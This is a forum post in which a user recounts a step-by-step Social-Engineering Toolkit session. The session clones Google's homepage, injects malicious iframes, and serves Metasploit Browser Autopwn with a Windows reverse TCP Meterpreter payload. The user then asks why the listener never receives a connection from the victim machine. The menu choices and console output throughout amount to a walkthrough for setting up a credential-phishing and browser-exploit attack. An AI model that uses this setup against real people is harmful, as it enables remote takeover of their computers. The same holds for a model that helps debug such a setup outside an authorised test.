Ok. So I have run into something that stumps me a bit and I can't find the answer anywhere... When using SET (Social-Engineering Toolkit) I have the same problem EVERY time I use it, no matter the function..
Here's my step-by-step on it.
1. Applications>BackTrack>Exploitation Tools>SE Tools>SET>set
2. On Terminal screen-Main Menu of SET
1 (Social-Engineering Attacks)
4. set> 2 (Website Attack Vectors)
5. set:webattack> 2 (Metasploit Browser Exploit Method)
[-] NAT/Port Forwarding can be used in the cases where your SET machine is
[-] not externally exposed and may be a different IP address than your reverse listener.
set> Are you using NAT/Port Forwarding [yes|no]: y
IP address to SET web server (this could be your external IP or hostname):xxx.xxx.xxx.xxx <-set to my external IP address
set:webattack> Is your payload handler (metasploit) on a different IP from your external NAT/Port FWD address [yes|no]: n
================================================== ==============================
Now it has me choose the template.
set:webattack> 3 (Google)
setayloads> 33 (Metasploit Browser Autopwn)
setayloads> 2 (Windows Reverse_TCP Meterpreter)
setayloads> Port to use for the reverse [443]:4444
================================================== ==============================[*] Cloning the website: http://www.google.com[*] This could take a little bit...[*] Injecting iframes into cloned website for MSF Attack....[*] Malicious iframe injection successful...crafting payload.

************************************************** *
Web Server Launched. Welcome to the SET Web Attack.
************************************************** *

[--] Tested on IE6, IE7, IE8, IE9, IE10, Safari, Opera, Chrome, and FireFox [--]
[*] Moving payload into cloned website.[*] The site has been moved. SET Web Server is now listening..
[-] Launching MSF Listener...
[-] This may take a few to load MSF...
(After a few moments pass...)
[-] *** <--
[-] * WARNING: Database support has been disabled<--
[-] ***<-- (I added arrows to these last 3 lines. I'm so confused as to why they are here..)

...(Loads all server modules)[*] --- Done, found 34 exploit modules
[*] Using URL:[*] Local IP:[*] Server started.

After this, when I get whatever the reverse_tcp to my Victim computer which I open it on, the listener then catches nothing...